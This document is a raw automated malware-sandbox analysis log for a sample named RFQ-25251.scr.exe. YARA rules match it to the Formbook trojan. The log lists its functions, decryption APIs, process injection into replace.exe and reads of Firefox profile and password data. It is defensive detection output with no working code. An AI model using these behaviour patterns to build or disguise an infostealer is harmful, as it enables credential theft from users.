                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F5BF07_2_012F5BF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F3A6C7_2_012F3A6C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01337A467_2_01337A46
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133FA497_2_0133FA49
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012C5AA07_2_012C5AA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01321AA37_2_01321AA3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131DAAC7_2_0131DAAC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132DAC67_2_0132DAC6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01337D737_2_01337D73
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01283D407_2_01283D40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01331D5A7_2_01331D5A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129FDC07_2_0129FDC0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F9C327_2_012F9C32
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133FCF27_2_0133FCF2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133FF097_2_0133FF09
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133FFB17_2_0133FFB1
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01281F927_2_01281F92
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01243FD57_2_01243FD5
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01243FD27_2_01243FD2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01289EB07_2_01289EB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F002C015_2_02F002C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F2027415_2_02F20274
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F403E615_2_02F403E6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8E3F015_2_02E8E3F0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3A35215_2_02F3A352
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1200015_2_02F12000
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F381CC15_2_02F381CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F341A215_2_02F341A2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F401AA15_2_02F401AA
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F0815815_2_02F08158
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E7010015_2_02E70100
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1A11815_2_02F1A118
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9C6E015_2_02E9C6E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E7C7C015_2_02E7C7C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8077015_2_02E80770
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EA475015_2_02EA4750
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F2E4F615_2_02F2E4F6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3244615_2_02F32446
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F2442015_2_02F24420
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F4059115_2_02F40591
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8053515_2_02E80535
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E7EA8015_2_02E7EA80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F36BD715_2_02F36BD7
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3AB4015_2_02F3AB40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EAE8F015_2_02EAE8F0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E668B815_2_02E668B8
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8A84015_2_02E8A840
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8284015_2_02E82840
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E829A015_2_02E829A0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F4A9A615_2_02F4A9A6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9696215_2_02E96962
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3EEDB15_2_02F3EEDB
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3CE9315_2_02F3CE93
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E92E9015_2_02E92E90
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E80E5915_2_02E80E59
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3EE2615_2_02F3EE26
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8CFE015_2_02E8CFE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E72FC815_2_02E72FC8
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EFEFA015_2_02EFEFA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EF4F4015_2_02EF4F40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F22F3015_2_02F22F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EC2F2815_2_02EC2F28
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EA0F3015_2_02EA0F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E70CF215_2_02E70CF2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F20CB515_2_02F20CB5
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E80C0015_2_02E80C00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E7ADE015_2_02E7ADE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E98DBF15_2_02E98DBF
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8AD0015_2_02E8AD00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1CD1F15_2_02F1CD1F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F212ED15_2_02F212ED
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9B2C015_2_02E9B2C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E852A015_2_02E852A0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EC739A15_2_02EC739A
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E6D34C15_2_02E6D34C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3132D15_2_02F3132D
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3F0E015_2_02F3F0E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F370E915_2_02F370E9
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E870C015_2_02E870C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F2F0CC15_2_02F2F0CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8B1B015_2_02E8B1B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB516C15_2_02EB516C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E6F17215_2_02E6F172
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F4B16B15_2_02F4B16B
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F316CC15_2_02F316CC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EC563015_2_02EC5630
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E717EC15_2_02E717EC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3F7B015_2_02F3F7B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E7146015_2_02E71460
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3F43F15_2_02F3F43F
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F495C315_2_02F495C3
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1D5B015_2_02F1D5B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3757115_2_02F37571
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F2DAC615_2_02F2DAC6
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EC5AA015_2_02EC5AA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F21AA315_2_02F21AA3
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1DAAC15_2_02F1DAAC
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EF3A6C15_2_02EF3A6C
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F37A4615_2_02F37A46
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3FA4915_2_02F3FA49
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EBDBF915_2_02EBDBF9
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EF5BF015_2_02EF5BF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9FB8015_2_02E9FB80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3FB7615_2_02F3FB76
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E838E015_2_02E838E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EED80015_2_02EED800
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E8995015_2_02E89950
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9B95015_2_02E9B950
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F1591015_2_02F15910
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E89EB015_2_02E89EB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E43FD515_2_02E43FD5
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E43FD215_2_02E43FD2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3FFB115_2_02F3FFB1
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E81F9215_2_02E81F92
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3FF0915_2_02F3FF09
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F3FCF215_2_02F3FCF2
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EF9C3215_2_02EF9C32
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E9FDC015_2_02E9FDC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F37D7315_2_02F37D73
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02E83D4015_2_02E83D40
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02F31D5A15_2_02F31D5A
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B16D015_2_004B16D0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004CA1E015_2_004CA1E0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004AC88715_2_004AC887
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004AC89015_2_004AC890
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004ACAB015_2_004ACAB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004AAB3015_2_004AAB30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B322B15_2_004B322B
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004B323015_2_004B3230
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02EEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02EB5130 appears 58 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02EFF290 appears 105 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02EC7E54 appears 109 times
                Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02E6B970 appears 283 times
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: String function: 012EEA12 appears 86 times
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: String function: 0126B970 appears 283 times
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: String function: 012C7E54 appears 109 times
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: String function: 012FF290 appears 105 times
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: String function: 012B5130 appears 58 times
                Source: RFQ-25251.scr.exeStatic PE information: invalid certificate
                Source: RFQ-25251.scr.exe, 00000000.00000000.1261281462.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYviV.exe& vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000000.00000002.1290105797.0000000008440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000000.00000002.1287358852.00000000041E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000000.00000002.1289499979.0000000007860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000000.00000002.1286396373.000000000164E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000007.00000002.1574095588.0000000000D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exe, 00000007.00000002.1574658810.000000000136D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exeBinary or memory string: OriginalFilenameYviV.exe& vs RFQ-25251.scr.exe
                Source: RFQ-25251.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: RFQ-25251.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.78d0000.6.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.32221b4.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.7860000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ-25251.scr.exe.7860000.4.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.7860000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ-25251.scr.exe.4201390.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ-25251.scr.exe.4201390.2.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.RFQ-25251.scr.exe.4201390.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.RFQ-25251.scr.exe.4608768.1.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ-25251.scr.exe.8440000.7.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, pKSsmDJgkrJrZbpmoM.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.RFQ-25251.scr.exe.4584948.3.raw.unpack, V1VJJpbrKU3pAW3f5X.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@18/10
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ-25251.scr.exe.logJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\replace.exeFile created: C:\Users\user\AppData\Local\Temp\C3vB7APKJump to behavior
                Source: RFQ-25251.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: RFQ-25251.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: replace.exe, 0000000F.00000003.1757940878.000000000075A000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3729973760.000000000075A000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1757817257.0000000000739000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000002.3729973760.0000000000789000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 0000000F.00000003.1759663213.0000000000765000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ-25251.scr.exeReversingLabs: Detection: 60%
                Source: RFQ-25251.scr.exeVirustotal: Detection: 37%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeProcess created: C:\Users\user\Desktop\RFQ-25251.scr.exe "C:\Users\user\Desktop\RFQ-25251.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeSection loaded: windows.storage.dllJump to behavior
